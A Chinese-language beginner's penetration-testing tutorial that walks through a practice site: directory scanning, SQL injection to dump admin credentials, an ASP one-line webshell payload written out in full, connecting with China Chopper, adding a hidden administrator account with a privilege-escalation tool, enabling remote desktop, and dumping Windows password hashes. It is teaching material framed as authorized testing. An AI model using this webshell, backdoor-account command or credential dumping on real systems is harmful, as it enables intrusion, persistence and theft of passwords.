web渗透测试常规套路

注:文章首发自合天智汇微信公众平台

0x01:本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路、工具可能在如今XX狗、XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中的工具如菜刀等更是经典之作,即使发布已经10余年认识现在渗透测试网站的不可或缺的利器之一。

另:面向学生的CTF,出题者考虑到学生的实操能力,设计的web题,或者拿服务器找flag的大题大部分用本文介绍的思路、工具就能成功cpature the flag。

说明:此次环境来自某网站的靶场,因为比较经典,所以 笔者将以此为例介绍web渗透测试中需要涉及的套路、工具等。网络安全法出来了,刚入门的小白就不要去动真实的网站了,不然真是从入门到入狱了。

场景模拟:此刻你已获权测试某网站,你将在接下来的一段时间里进行测试,注意不要泄露网站敏感数据,所以接下里的所有图片将会以打码方式呈现

准备工作:

准备好以下工具:御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等

拿到一个网站,首先我们最容易想到的就是扫描目录。

最常用的工具是御剑,页面如图
web渗透测试常规套路_第1张图片

在域名空格中输入我们测试的网站的域名,点击开始扫描即可
web渗透测试常规套路_第2张图片

我们在结果中发现/admin,这疑似后台页面,双击该链接进入,看看判断是否正确
web渗透测试常规套路_第3张图片

可以看到确实是后台登陆页面

web渗透测试常规套路_第4张图片

找到后台登陆界面了,接下来我们就需要登陆的用户名和密码了,所以寻找用户名和密码就是我们下一步的工作

这一步我们用到的工具是Domain3.6,界面如图

web渗透测试常规套路_第5张图片

点击SQL注入—》批量扫描注入点—》添加网址,输入网址

web渗透测试常规套路_第6张图片

点击OK,然后点击批量分析注入点

web渗透测试常规套路_第7张图片

得到结果如图

web渗透测试常规套路_第8张图片

点击OK关闭弹窗,在注入点栏目下随机选择一条,右击选择“检测注入”

web渗透测试常规套路_第9张图片

如图所示

web渗透测试常规套路_第10张图片

点击“开始检测”,得到结果如图

web渗透测试常规套路_第11张图片

点击“猜解表名”

web渗透测试常规套路_第12张图片

在结果中选择admin
web渗透测试常规套路_第13张图片

选中admin后点击猜解列名

得到结果如图

web渗透测试常规套路_第14张图片

Username,password是我们需要的信息,所以在前面的方框中勾选,点击猜解内容,如下图

web渗透测试常规套路_第15张图片

结果如下图,成功得到用户名和密

web渗透测试常规套路_第16张图片

不过密码很明显是md5加密后的

我们在Md5在线解密网站中解密即可

web渗透测试常规套路_第17张图片

得到结果,明文密码为admin888

现在有了用户名和密码,我们就返回后台登陆页面

输入信息后成功登陆
web渗透测试常规套路_第18张图片

成功进入后台
web渗透测试常规套路_第19张图片

接下来我们需要获取webshell,这一步仁者见仁智者见智,需要凭借个人的经验来多次尝试分析确定

此处仅提供个人思路

我们点击左侧的“系统设置管理”—》“网站信息配置”
web渗透测试常规套路_第20张图片

在公司名称处将原信息删除,换成我们的一句话木马

“%><%Eval Request(Chr(35))%><%’

(解释:1.句首和句尾的引号用于闭合语句,2.Request()中的内容即连接菜刀时需要的密码,此处用的Chr(35)指的是ascii值为35的符号,即#,3.Eval Request()是asp一句话木马的常用格式)
web渗透测试常规套路_第21张图片

点击保存设置

接下来的步骤是连接菜刀

打开菜刀,界面如图
web渗透测试常规套路_第22张图片

在空白处右键,添加,在弹出框中输入地址及密码(之前说过为#
web渗透测试常规套路_第23张图片

这里小白白们可能会问了,为什么地址后面的/inc/config.asp之前没有见过呢?

是这样的,这个网站用的是魅力企业网站管理系统(一个cms),我们可以在网上下到它的源码,可以看到它整个的目录结构,自然会明白我们修改的一句话的目录在/inc/config.asp

输入信息后点击添加,发现连接成功

注意:一般的CTF比赛,做到这个程度就可以在各个目录里找flag了,不过这次我们把整个渗透流程介绍完

接下来我们需要提权,那么就需要通过菜刀上传提权工具,这里上传的位置要选好,一般而言,c盘的子目录中的文件可执行的可能性较大

提权经典的搭配是cmd+3389+pr,我们这里就用这个组合,同时选定上传目录为C:\RECYCLER
web渗透测试常规套路_第24张图片

直接将我们需要用到的工具pr,3389,cmd选中后拖进即可
web渗透测试常规套路_第25张图片

可以看到已经上传成功

选中cmd,右击选择虚拟终端,打开如图所示页面

web渗透测试常规套路_第26张图片

敲回车后开始输入我们的命令

web渗透测试常规套路_第27张图片

来切换到我们提权工具所在的目录

web渗透测试常规套路_第28张图片

我们开始使用pr创建用户,用法如图

web渗透测试常规套路_第29张图片

注意,虽然pr “net user yale 888 /add”执行后提示命令成功完成,为了确认,我们可以输入pr “net user”确保确实成功添加该用户(用户名yale,密码888)

接下来我们尝试将yale添加到系统管理员组

同理,第二条命令是为了确保添加成功

既然添加成功了,我们接下来就开启3389
web渗透测试常规套路_第30张图片

我们win+r,打开运行框后输入mstsc,打开远程桌面连接

在空白框中输入ip即可开始连接

点击连接后弹出认证界面,输入我们创建的用户名和密码

web渗透测试常规套路_第31张图片

点击确定即可成功登陆

web渗透测试常规套路_第32张图片

接下来我们需要想到这个问题:以后远程登陆难道及靠我们自己创建的帐号吗?要是哪天被管理员发现了,那怎么办,所以长久之计是在获取系统管理员的密码后删除自己创建的用户

那么,接下里我们要做的就是找到系统管理员的密码

我们这里用到的工具是quarksdump,还是和前三个工具一样,拖到菜刀里直接上传

web渗透测试常规套路_第33张图片

我们在远程连接的服务器中打开cmd窗口

web渗透测试常规套路_第34张图片

进入recycler目录看到工具已上传

web渗透测试常规套路_第35张图片

输入quarkspwdump.exe回车后立刻弹出如下窗口
web渗透测试常规套路_第36张图片

输入如图命令,回车即可得到

我们看到最下面一列是Administrators跟随的一串字符,这其实也是一串hash加密过的密码值(Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值),解密得到

这里写图片描述

密码为cu9e2cgw

渗透测试结束。

此刻不要忘了按照规范整理一套完整的安全报告以及可行的修补建议并提交给甲方。

0x03
总结:一次典型的渗透测试的过程就是如上所示,主要思路为

扫后台—找注入点获取后台登陆密码—上传一句话木马—菜刀连接—提权—拿服务器获取系统管理员密码

用到的工具有:御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等

本文仅做技术分享及普及渗透流程之用,如有人企图以此来进行不合法的渗透等破坏网络安全的行为与本文作者无关,特此声明

你可能感兴趣的:(web渗透测试常规套路)